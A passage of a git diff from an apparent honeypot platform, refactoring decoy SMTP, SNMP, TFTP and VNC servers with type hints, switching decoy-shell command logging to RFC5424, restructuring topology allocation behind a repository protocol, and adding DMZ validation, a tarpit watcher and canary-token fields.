tuple[str, str]: class SMTPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] + def __init__(self): self._transport = None self._peer = ("?", 0) @@ -228,11 +233,11 @@ class SMTPProtocol(asyncio.Protocol): # ── asyncio.Protocol ────────────────────────────────────────────────────── - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = self._transport.get_extra_info("peername", ("?", 0)) _log("connect", src=self._peer[0], src_port=self._peer[1]) - transport.write(f"{_SMTP_BANNER}\r\n".encode()) + self._transport.write(f"{_SMTP_BANNER}\r\n".encode()) def data_received(self, data): self._buf += data @@ -247,6 +252,7 @@ class SMTPProtocol(asyncio.Protocol): # ── Command dispatch ────────────────────────────────────────────────────── def _handle_line(self, line: str) -> None: + assert self._transport is not None # ── DATA body accumulation ──────────────────────────────────────────── if self._in_data: if line == ".": @@ -444,6 +450,7 @@ class SMTPProtocol(asyncio.Protocol): # ── AUTH helpers ────────────────────────────────────────────────────────── def _handle_auth(self, args: str) -> None: + assert self._transport is not None parts = args.split(None, 1) mech = parts[0].upper() if parts else "" initial = parts[1] if len(parts) > 1 else "" @@ -468,6 +475,7 @@ class SMTPProtocol(asyncio.Protocol): self._transport.write(b"504 5.5.4 Unrecognized authentication mechanism\r\n") def _finish_auth(self, username: str, password: str) -> None: + assert self._transport is not None _log("auth_attempt", src=self._peer[0], username=username, principal=username, severity=SEVERITY_WARNING, **encode_secret(password)) diff --git a/decnet/templates/smtp/syslog_bridge.py b/decnet/templates/smtp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/smtp/syslog_bridge.py +++ b/decnet/templates/smtp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/snmp/server.py b/decnet/templates/snmp/server.py index d388bbce..a98ba342 100644 --- a/decnet/templates/snmp/server.py +++ b/decnet/templates/snmp/server.py @@ -9,6 +9,7 @@ Logs all requests as JSON. import asyncio import os import struct +from typing import cast from syslog_bridge import ( encode_secret, forward_syslog, @@ -225,11 +226,13 @@ def _build_response(version: int, community: str, request_id: int, oids: list) - class SNMPProtocol(asyncio.DatagramProtocol): + _transport: asyncio.DatagramTransport | None = None + def __init__(self): self._transport = None - def connection_made(self, transport): - self._transport = transport + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.DatagramTransport, transport) def datagram_received(self, data, addr): try: @@ -244,7 +247,8 @@ class SNMPProtocol(asyncio.DatagramProtocol): principal=None, secret_kind="snmp_community", **encode_secret(community)) response = _build_response(version, community, request_id, oids) - self._transport.sendto(response, addr) + if self._transport is not None: + self._transport.sendto(response, addr) except Exception as e: _log("parse_error", severity=4, src=addr[0], error=str(e), data=data[:64].hex()) diff --git a/decnet/templates/snmp/syslog_bridge.py b/decnet/templates/snmp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/snmp/syslog_bridge.py +++ b/decnet/templates/snmp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/ssh/Dockerfile b/decnet/templates/ssh/Dockerfile index 364f3bcc..33515a87 100644 --- a/decnet/templates/ssh/Dockerfile +++ b/decnet/templates/ssh/Dockerfile @@ -109,7 +109,7 @@ RUN echo 'alias ll="ls -alF"' >> /root/.bashrc && \ echo 'alias l="ls -CF"' >> /root/.bashrc && \ echo 'export HISTSIZE=1000' >> /root/.bashrc && \ echo 'export HISTFILESIZE=2000' >> /root/.bashrc && \ - echo 'PROMPT_COMMAND='"'"'logger -p user.info -t bash "CMD uid=$UID user=$USER src=${SSH_CLIENT%% *} pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc + echo 'PROMPT_COMMAND='"'"'logger --rfc5424 --msgid command -p user.info -t bash "CMD uid=$UID user=$USER src=${SSH_CLIENT%% *} pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc # Fake project files to look lived-in RUN mkdir -p /root/projects /root/backups /var/www/html && \ diff --git a/decnet/templates/ssh/syslog_bridge.py b/decnet/templates/ssh/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/ssh/syslog_bridge.py +++ b/decnet/templates/ssh/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/syslog_bridge.py b/decnet/templates/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/syslog_bridge.py +++ b/decnet/templates/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/telnet/Dockerfile b/decnet/templates/telnet/Dockerfile index 43f421c6..70650aca 100644 --- a/decnet/templates/telnet/Dockerfile +++ b/decnet/templates/telnet/Dockerfile @@ -83,7 +83,7 @@ RUN mkdir -p /root/scripts /root/backups && \ printf 'alias ll="ls -alF"\nalias la="ls -A"\nexport HISTSIZE=1000\n' >> /root/.bashrc # Log bash commands via syslog -RUN echo 'PROMPT_COMMAND='"'"'logger -p user.info -t bash "CMD uid=$UID pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc +RUN echo 'PROMPT_COMMAND='"'"'logger --rfc5424 --msgid command -p user.info -t bash "CMD uid=$UID pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc COPY entrypoint.sh /entrypoint.sh RUN chmod +x /entrypoint.sh diff --git a/decnet/templates/telnet/syslog_bridge.py b/decnet/templates/telnet/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/telnet/syslog_bridge.py +++ b/decnet/templates/telnet/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/tftp/server.py b/decnet/templates/tftp/server.py index 1faf0bdb..3f9a283b 100644 --- a/decnet/templates/tftp/server.py +++ b/decnet/templates/tftp/server.py @@ -8,6 +8,7 @@ then responds with an error packet. Logs all requests as JSON. import asyncio import os import struct +from typing import cast from syslog_bridge import syslog_line, write_syslog_file, forward_syslog NODE_NAME = os.environ.get("NODE_NAME", "tftpserver") @@ -33,11 +34,13 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class TFTPProtocol(asyncio.DatagramProtocol): + _transport: asyncio.DatagramTransport | None = None + def __init__(self): self._transport = None - def connection_made(self, transport): - self._transport = transport + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.DatagramTransport, transport) def datagram_received(self, data: bytes, addr): if len(data) < 4: @@ -56,7 +59,8 @@ class TFTPProtocol(asyncio.DatagramProtocol): filename=filename, mode=mode, ) - self._transport.sendto(_error_pkt(2, "Access violation"), addr) + if self._transport is not None: + self._transport.sendto(_error_pkt(2, "Access violation"), addr) else: _log("unknown_opcode", src=addr[0], opcode=opcode, data=data[:32].hex()) diff --git a/decnet/templates/tftp/syslog_bridge.py b/decnet/templates/tftp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/tftp/syslog_bridge.py +++ b/decnet/templates/tftp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/vnc/server.py b/decnet/templates/vnc/server.py index 32cbdc57..4015d20c 100644 --- a/decnet/templates/vnc/server.py +++ b/decnet/templates/vnc/server.py @@ -9,6 +9,7 @@ failed". Logs the raw response for offline cracking. import asyncio import os import base64 as _base64 +from typing import cast from syslog_bridge import syslog_line, write_syslog_file, forward_syslog NODE_NAME = os.environ.get("NODE_NAME", "desktop") @@ -26,24 +27,29 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class VNCProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" self._state = "version" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) # Send RFB version - transport.write(b"RFB 003.008\n") + self._transport.write(b"RFB 003.008\n") def data_received(self, data): self._buf += data self._process() - def _process(self): + def _process(self) -> None: + assert self._transport is not None + assert self._peer is not None if self._state == "version": if b"\n" not in self._buf: return diff --git a/decnet/templates/vnc/syslog_bridge.py b/decnet/templates/vnc/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/vnc/syslog_bridge.py +++ b/decnet/templates/vnc/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/topology/allocator.py b/decnet/topology/allocator.py index 7600c730..86ecc8d4 100644 --- a/decnet/topology/allocator.py +++ b/decnet/topology/allocator.py @@ -12,8 +12,9 @@ open one. from __future__ import annotations from ipaddress import IPv4Network -from typing import Any, Iterable +from typing import Iterable +from decnet.topology.repository import TopologyRepository from decnet.topology.status import TopologyStatus @@ -34,6 +35,7 @@ class IPAllocator: self._pool: list[str] = [ str(ip) for ip in self._net.hosts() if str(ip) != self._gateway ] + self._host_set: frozenset[str] = frozenset(str(h) for h in self._net.hosts()) self._taken: set[str] = set() self._cursor = 0 @@ -57,7 +59,7 @@ class IPAllocator: def reserve(self, ip: str) -> None: if ip == self._gateway: raise ValueError(f"{ip} is the gateway of {self._net.with_prefixlen}") - if ip not in {str(h) for h in self._net.hosts()}: + if ip not in self._host_set: raise ValueError(f"{ip} not in {self._net.with_prefixlen}") self._taken.add(ip) @@ -65,7 +67,7 @@ class IPAllocator: self._taken.discard(ip) def is_free(self, ip: str) -> bool: - return ip not in self._taken and ip in {str(h) for h in self._net.hosts()} and ip != self._gateway + return ip not in self._taken and ip in self._host_set and ip != self._gateway class SubnetAllocator: @@ -148,13 +150,12 @@ _SUBNET_CLAIMING_STATES: frozenset[str] = frozenset( ) -async def reserved_subnets(repo: Any) -> set[str]: +async def reserved_subnets(repo: TopologyRepository) -> set[str]: """All LAN subnets currently claimed by non-torn-down topologies.""" out: set[str] = set() for status in _SUBNET_CLAIMING_STATES: for topo in await repo.list_topologies(status=status): - for lan in await repo.list_lans_for_topology(topo["id"]): - subnet = lan.get("subnet") - if subnet: - out.add(subnet) + for lan in await repo.list_lans_for_topology(topo.id): + if lan.subnet: + out.add(lan.subnet) return out diff --git a/decnet/topology/compose.py b/decnet/topology/compose.py index 0cb41357..7de8a86a 100644 --- a/decnet/topology/compose.py +++ b/decnet/topology/compose.py @@ -26,6 +26,10 @@ from decnet.services.registry import get_service _DEFAULT_BASE_IMAGE = "debian:bookworm-slim" +# 8 chars matches the git short-SHA convention; collision-safe within +# a single deployment's network namespace. +_TOPOLOGY_ID_PREFIX_LEN = 8 + _DOCKER_LOGGING = { "driver": "json-file", "options": {"max-size": "10m", "max-file": "5"}, @@ -34,12 +38,12 @@ _DOCKER_LOGGING = { def _network_name(topology_id: str, lan_name: str) -> str: """Docker network name for a given (topology, LAN) pair.""" - return f"decnet_t_{topology_id[:8]}_{lan_name.lower()}" + return f"decnet_t_{topology_id[:_TOPOLOGY_ID_PREFIX_LEN]}_{lan_name.lower()}" def _container_name(topology_id: str, decky_name: str) -> str: """Container name for a decky base in a topology.""" - return f"decnet_t_{topology_id[:8]}_{decky_name}" + return f"decnet_t_{topology_id[:_TOPOLOGY_ID_PREFIX_LEN]}_{decky_name}" def generate_topology_compose(hydrated: dict[str, Any]) -> dict: diff --git a/decnet/topology/generator.py b/decnet/topology/generator.py index 7933f189..aea513bc 100644 --- a/decnet/topology/generator.py +++ b/decnet/topology/generator.py @@ -23,7 +23,9 @@ from decnet.topology.config import ( _PlannedLAN, ) -# Range of services per randomly assigned decky (matches decnet.fleet). +# Per-decky service count bounds. 1 minimum keeps every decky functional; +# 3 maximum balances service diversity against subnet IP utilization — the +# full non-singleton service pool (~28 entries) makes higher counts wasteful. _SVC_MIN = 1 _SVC_MAX = 3 @@ -74,7 +76,7 @@ def _pick_services( rng: random.Random, services_explicit: Optional[list[str]], pool: list[str], - used_combos: set[frozenset], + seen_service_pairs: set[frozenset], ) -> list[str]: if services_explicit: return list(services_explicit) @@ -85,12 +87,39 @@ def _pick_services( count = rng.randint(_SVC_MIN, min(_SVC_MAX, len(pool))) # nosec B311 chosen = frozenset(rng.sample(pool, count)) # nosec B311 attempts += 1 - if chosen not in used_combos or attempts > 20: + if chosen not in seen_service_pairs or attempts > 20: break - used_combos.add(chosen) + seen_service_pairs.add(chosen) return list(chosen) +def _take_ip(ip_allocs: dict[str, IPAllocator], lan_name: str) -> str: + return ip_allocs[lan_name].next_free() + + +def _new_decky( + home_lan: str, + *, + counter: list[int], + rng: random.Random, + config: TopologyConfig, + svc_pool: list[str], + seen_service_pairs: set[frozenset], + ip_allocs: dict[str, IPAllocator], + deckies: list[_PlannedDecky], +) -> _PlannedDecky: + counter[0] += 1 + name = f"decky-{counter[0]:03d}" + services = _pick_services(rng, config.services_explicit, svc_pool, seen_service_pairs) + decky = _PlannedDecky( + name=name, + services=services, + ips_by_lan={home_lan: _take_ip(ip_allocs, home_lan)}, + ) + deckies.append(decky) + return decky + + def generate( config: TopologyConfig, *, @@ -108,7 +137,9 @@ def generate( """ rng = random.Random(config.seed) # nosec B311 svc_pool = all_service_names() if config.randomize_services else [] - used_combos: set[frozenset] = set() + # Tracks unique service frozensets assigned so far; prevents every decky + # from getting the same randomly-picked combo on small service pools. + seen_service_pairs: set[frozenset] = set() subnets = SubnetAllocator( config.subnet_base_prefix, reserved=reserved_subnets or set() @@ -121,27 +152,9 @@ def generate( lan.name: IPAllocator(lan.subnet) for lan in lans } - def _take_ip(lan_name: str) -> str: - return ip_allocs[lan_name].next_free() - deckies: list[_PlannedDecky] = [] edges: list[_PlannedEdge] = [] - decky_counter = 0 - - def _new_decky(home_lan: str) -> _PlannedDecky: - nonlocal decky_counter - decky_counter += 1 - name = f"decky-{decky_counter:03d}" - services = _pick_services( - rng, config.services_explicit, svc_pool, used_combos - ) - decky = _PlannedDecky( - name=name, - services=services, - ips_by_lan={home_lan: _take_ip(home_lan)}, - ) - deckies.append(decky) - return decky + decky_counter = [0] # Populate each LAN with its own deckies. for lan in lans: @@ -154,7 +167,16 @@ def generate( if count < 1: count = 1 # every LAN needs ≥1 decky to host the bridge for _ in range(count): - decky = _new_decky(lan.name) + decky = _new_decky( + lan.name, + counter=decky_counter, + rng=rng, + config=config, + svc_pool=svc_pool, + seen_service_pairs=seen_service_pairs, + ip_allocs=ip_allocs, + deckies=deckies, + ) edges.append( _PlannedEdge( decky_name=decky.name, @@ -178,7 +200,7 @@ def generate( continue candidates = deckies_by_lan[lan.name] bridge = rng.choice(candidates) # nosec B311 - bridge.ips_by_lan[lan.parent] = _take_ip(lan.parent) + bridge.ips_by_lan[lan.parent] = _take_ip(ip_allocs, lan.parent) forwards = rng.random() < config.bridge_forward_probability # nosec B311 bridge.forwards_l3 = bridge.forwards_l3 or forwards # Mark both existing edges as bridge edges for this decky, and @@ -214,7 +236,7 @@ def generate( decky = rng.choice(deckies_by_lan[lan.name]) # nosec B311 if peer.name in decky.ips_by_lan: continue # already connected, skip - decky.ips_by_lan[peer.name] = _take_ip(peer.name) + decky.ips_by_lan[peer.name] = _take_ip(ip_allocs, peer.name) forwards = rng.random() < config.bridge_forward_probability # nosec B311 decky.forwards_l3 = decky.forwards_l3 or forwards for e in edges: diff --git a/decnet/topology/persistence.py b/decnet/topology/persistence.py index 5cf9616c..df5ef9bc 100644 --- a/decnet/topology/persistence.py +++ b/decnet/topology/persistence.py @@ -5,12 +5,13 @@ from ipaddress import IPv4Address, IPv4Network from typing import Any from decnet.topology.allocator import IPAllocator +from decnet.topology.repository import TopologyRepository from decnet.topology.config import GeneratedTopology from decnet.topology.status import TopologyStatus, assert_transition async def persist( - repo: Any, + repo: TopologyRepository, plan: GeneratedTopology, *, target_host_uuid: str | None = None, @@ -90,7 +91,7 @@ async def persist( async def transition_status( - repo: Any, + repo: TopologyRepository, topology_id: str, new_status: str, reason: str | None = None, @@ -103,11 +104,11 @@ async def transition_status( topo = await repo.get_topology(topology_id) if topo is None: raise ValueError(f"topology {topology_id!r} not found") - assert_transition(topo["status"], new_status) + assert_transition(topo.status, new_status) await repo.update_topology_status(topology_id, new_status, reason=reason) -async def hydrate(repo: Any, topology_id: str) -> dict[str, Any] | None: +async def hydrate(repo: TopologyRepository, topology_id: str) -> dict[str, Any] | None: """Load a topology + children into a single dict for callers. Shape:: @@ -124,15 +125,21 @@ async def hydrate(repo: Any, topology_id: str) -> dict[str, Any] | None: topo = await repo.get_topology(topology_id) if topo is None: return None - lans = await repo.list_lans_for_topology(topology_id) - deckies = await repo.list_topology_deckies(topology_id) - edges = await repo.list_topology_edges(topology_id) - _backfill_decky_configs(lans, deckies, edges) + lans_dto = await repo.list_lans_for_topology(topology_id) + deckies_dto = await repo.list_topology_deckies(topology_id) + edges_dto = await repo.list_topology_edges(topology_id) + # Convert to dicts for _backfill_decky_configs (mutates decky_config in-place). + # mode="json" is mandatory: datetime fields must arrive as ISO strings for all + # downstream consumers (canonical_hash, deployer, api_get_topology, etc.). + lan_dicts = [m.model_dump(mode="json") for m in lans_dto] + decky_dicts = [m.model_dump(mode="json") for m in deckies_dto] + edge_dicts = [m.model_dump(mode="json") for m in edges_dto] + _backfill_decky_configs(lan_dicts, decky_dicts, edge_dicts) return { - "topology": topo, - "lans": lans, - "deckies": deckies, - "edges": edges, + "topology": topo.model_dump(mode="json"), + "lans": lan_dicts, + "deckies": decky_dicts, + "edges": edge_dicts, } diff --git a/decnet/topology/repository.py b/decnet/topology/repository.py new file mode 100644 index 00000000..6a2c7317 --- /dev/null +++ b/decnet/topology/repository.py @@ -0,0 +1,29 @@ +from __future__ import annotations + +from typing import Any, Optional, Protocol + +from decnet.web.db.models.topology import DeckyRow, EdgeRow, LANRow, TopologySummary + + +class TopologyRepository(Protocol): + """Structural contract for the topology subsystem's repo dependency. + + Declares only the 10 methods the topology package actually calls. + Any object with matching async signatures satisfies this Protocol + without inheritance — including BaseRepository and test stubs. + """ + + async def create_topology(self, data: dict[str, Any]) -> str: ... + async def get_topology(self, topology_id: str) -> Optional[TopologySummary]: ... + async def update_topology_status( + self, topology_id: str, new_status: str, reason: Optional[str] = None + ) -> None: ... + async def list_topologies( + self, status: Optional[str] = None + ) -> list[TopologySummary]: ... + async def add_lan(self, data: dict[str, Any]) -> str: ... + async def list_lans_for_topology(self, topology_id: str) -> list[LANRow]: ... + async def add_topology_decky(self, data: dict[str, Any]) -> str: ... + async def list_topology_deckies(self, topology_id: str) -> list[DeckyRow]: ... + async def add_topology_edge(self, data: dict[str, Any]) -> str: ... + async def list_topology_edges(self, topology_id: str) -> list[EdgeRow]: ... diff --git a/decnet/topology/validate.py b/decnet/topology/validate.py index bc241659..1cce0b8c 100644 --- a/decnet/topology/validate.py +++ b/decnet/topology/validate.py @@ -16,8 +16,11 @@ from ipaddress import IPv4Address, IPv4Network from typing import Any, Callable, Literal from decnet.fleet import all_service_names +from decnet.logging import get_logger from decnet.services.registry import get_service +log = get_logger("topology.validate") + Severity = Literal["error", "warning"] @@ -283,6 +286,72 @@ def check_service_config_shape(h: dict[str, Any]) -> list[ValidationIssue]: return issues +def check_gateway_homed_in_dmz(h: dict[str, Any]) -> list[ValidationIssue]: + """Gateway deckies must live in a DMZ LAN. + + ``forwards_l3=True`` triggers host-port publishing in the compose + generator (see :mod:`decnet.topology.compose`); a gateway sitting + on an internal LAN would publish ports on the host without anyone + on the right side of the perimeter able to reach the service + legitimately. The semantic is "this decky is the front door" — + only meaningful when the LAN is the DMZ. + + Not in ``_RULES``: ``forwards_l3`` encodes two semantics — internal + bridge routing (generator-assigned, legitimately on non-DMZ LANs) and + DMZ gateway publication (operator-assigned, must be DMZ-homed). + Standing validation cannot distinguish them; this check is therefore + path-specific and called only on the explicit operator flip path + (``forwards_l3: False → True`` via ``apply_update_decky``). + """ + if not h.get("deckies"): + return [] + + lans_by_id = {lan["id"]: lan for lan in h["lans"]} + dmz_lan_ids = { + lan["id"] for lan in h["lans"] if lan.get("is_dmz") + } + dmz_lan_names = { + lan["name"] for lan in h["lans"] if lan.get("is_dmz") + } + + # Home-LAN selection mirrors the frontend hydration: prefer the + # non-bridge edge. Falls back to the first edge if no + # is_bridge flag is set (legacy rows). + home_lan_for: dict[str, str] = {} # decky_uuid → lan_id + for e in h["edges"]: + if e.get("is_bridge") is False and e["decky_uuid"] not in home_lan_for: + home_lan_for[e["decky_uuid"]] = e["lan_id"] + for e in h["edges"]: + if e["decky_uuid"] in home_lan_for: + continue + home_lan_for[e["decky_uuid"]] = e["lan_id"] + + issues: list[ValidationIssue] = [] + for d in h["deckies"]: + cfg = d.get("decky_config") or {} + if not cfg.get("forwards_l3"): + continue + home_lan_id = home_lan_for.get(d["uuid"]) + if home_lan_id is None or home_lan_id not in dmz_lan_ids: + home_lan_name = ( + lans_by_id.get(home_lan_id, {}).get("name") + if home_lan_id + else "(no home LAN)" + ) + allowed = ", ".join(sorted(dmz_lan_names)) or "(no DMZ defined)" + issues.append( + ValidationIssue( + "error", + "GATEWAY_NOT_IN_DMZ", + f"gateway decky {d['name']!r} is on LAN " + f"{home_lan_name!r}; gateways must home in a DMZ " + f"LAN ({allowed})", + target={"decky": d["name"], "lan": home_lan_name}, + ) + ) + return issues + + def check_no_host_port_collision(h: dict[str, Any]) -> list[ValidationIssue]: """Flag gateway service ports that are already bound on the host. @@ -311,7 +380,8 @@ def check_no_host_port_collision(h: dict[str, Any]) -> list[ValidationIssue]: for c in psutil.net_connections(kind="inet") if c.status == psutil.CONN_LISTEN and c.laddr } - except Exception: + except ImportError: + log.warning("psutil not available; skipping host port collision check") return [] issues: list[ValidationIssue] = [] @@ -342,6 +412,8 @@ _RULES: list[Callable[[dict[str, Any]], list[ValidationIssue]]] = [ check_services_known, check_service_config_shape, ] +# check_gateway_homed_in_dmz is intentionally absent — it is path-specific +# (forwards_l3 overloads two semantics). See its docstring. def validate(hydrated: dict[str, Any]) -> list[ValidationIssue]: diff --git a/decnet/web/api.py b/decnet/web/api.py index d40836b2..7d8dff12 100644 --- a/decnet/web/api.py +++ b/decnet/web/api.py @@ -31,6 +31,7 @@ from decnet.web.dependencies import repo from decnet.collector import log_collector_worker from decnet.web.ingester import log_ingestion_worker from decnet.profiler import attacker_profile_worker +from decnet.tarpit import tarpit_watcher_worker from decnet.web.limiter import limiter from decnet.web.router import api_router from slowapi import _rate_limit_exceeded_handler @@ -43,6 +44,7 @@ collector_task: Optional[asyncio.Task[Any]] = None attacker_task: Optional[asyncio.Task[Any]] = None sniffer_task: Optional[asyncio.Task[Any]] = None heartbeat_task: Optional[asyncio.Task[Any]] = None +tarpit_task: Optional[asyncio.Task[Any]] = None def get_background_tasks() -> dict[str, Optional[asyncio.Task[Any]]]: @@ -52,13 +54,14 @@ def get_background_tasks() -> dict[str, Optional[asyncio.Task[Any]]]: "collector_worker": collector_task, "attacker_worker": attacker_task, "sniffer_worker": sniffer_task, + "tarpit_watcher": tarpit_task, } @asynccontextmanager async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]: global ingestion_task, collector_task, attacker_task, sniffer_task - global heartbeat_task + global heartbeat_task, tarpit_task import resource soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) @@ -162,6 +165,11 @@ async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]: log.warning("Sniffer worker failed to start — API continues without sniffing: %s", exc) else: log.debug("API startup: sniffer not embedded — expecting standalone daemon") + + # Tarpit watcher — always-on, near-zero cost when no rules exist. + if tarpit_task is None or tarpit_task.done(): + tarpit_task = asyncio.create_task(tarpit_watcher_worker(repo)) + log.debug("API startup: tarpit watcher started") else: log.info("Contract Test Mode: skipping background worker startup") @@ -191,7 +199,7 @@ async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]: await get_registry().stop() except Exception as exc: # noqa: BLE001 log.warning("worker registry stop raised: %s", exc) - for task in (ingestion_task, collector_task, attacker_task, sniffer_task, heartbeat_task): + for task in (ingestion_task, collector_task, attacker_task, sniffer_task, heartbeat_task, tarpit_task): if task and not task.done(): task.cancel() try: diff --git a/decnet/web/db/models/__init__.py b/decnet/web/db/models/__init__.py index f3d2d74d..10ea3d18 100644 --- a/decnet/web/db/models/__init__.py +++ b/decnet/web/db/models/__init__.py @@ -63,6 +63,16 @@ from .deploy import ( MutateIntervalRequest, PurgeResponse, ) +from .decky import ( + DeckyFileDeleteRequest, + DeckyFileDropRequest, + DeckyServiceAddRequest, + DeckyServiceConfigRequest, + DeckyServiceConfigResponse, + DeckyServicesResponse, + ServiceConfigFieldDTO, + ServiceSchemaResponse, +) from .fleet import ( LOCAL_HOST_SENTINEL, FleetDecky, @@ -169,6 +179,12 @@ from .workers import ( WorkersResponse, WorkerStatus, ) +from .tarpit import ( + TarpitEnableRequest, + TarpitRule, + TarpitRuleResponse, + TarpitStatusResponse, +) __all__ = [ # _base @@ -222,7 +238,15 @@ __all__ = [ "PurgeResponse", # fleet "LOCAL_HOST_SENTINEL", + "DeckyFileDeleteRequest", + "DeckyFileDropRequest", + "DeckyServiceAddRequest", + "DeckyServiceConfigRequest", + "DeckyServiceConfigResponse", + "DeckyServicesResponse", "FleetDecky", + "ServiceConfigFieldDTO", + "ServiceSchemaResponse", # health "ComponentHealth", "HealthResponse", @@ -316,4 +340,9 @@ __all__ = [ "WorkerControlResponse", "WorkersResponse", "WorkerStatus", + # tarpit + "TarpitEnableRequest", + "TarpitRule", + "TarpitRuleResponse", + "TarpitStatusResponse", ] diff --git a/decnet/web/db/models/canary.py b/decnet/web/db/models/canary.py index efc155c0..e58c8ba2 100644 --- a/decnet/web/db/models/canary.py +++ b/decnet/web/db/models/canary.py @@ -100,6 +100,12 @@ class CanaryToken(SQLModel, table=True): uuid: str = Field(default_factory=lambda: str(uuid4()), primary_key=True) kind: str = Field(index=True) # CanaryKind literal at the API layer decky_name: str = Field(index=True) # FleetDecky.name; no FK (composite PK) + # When NULL, the token is on a fleet decky (decky_name resolves to + # ``-ssh``). When set, it points at a MazeNET topology — the + # planter resolves the container via :func:`resolve_topology_container`. + # No FK: topologies are mutable and we don't want a row to vanish on + # cascade; the row is the historical record of placement. + topology_id: Optional[str] = Field(default=None, index=True) blob_uuid: Optional[str] = Field( default=None, foreign_key="canary_blobs.uuid", index=True, ) @@ -126,6 +132,12 @@ class CanaryToken(SQLModel, table=True): last_error: Optional[str] = Field( default=None, sa_column=Column("last_error", Text, nullable=True), ) + # 16-hex HMAC nonce embedded in fingerprint canary JS payloads. NULL for + # all non-fingerprint generators. Derived at mint time from + # HMAC-SHA256(DECNET_CANARY_FINGERPRINT_SECRET, callback_token + mint_uuid) + # truncated to 16 chars; the worker validates incoming ?n= against this + # value to reject slug-only fingerprint spoofs. + fingerprint_nonce: Optional[str] = Field(default=None, max_length=16) class CanaryTrigger(SQLModel, table=True): @@ 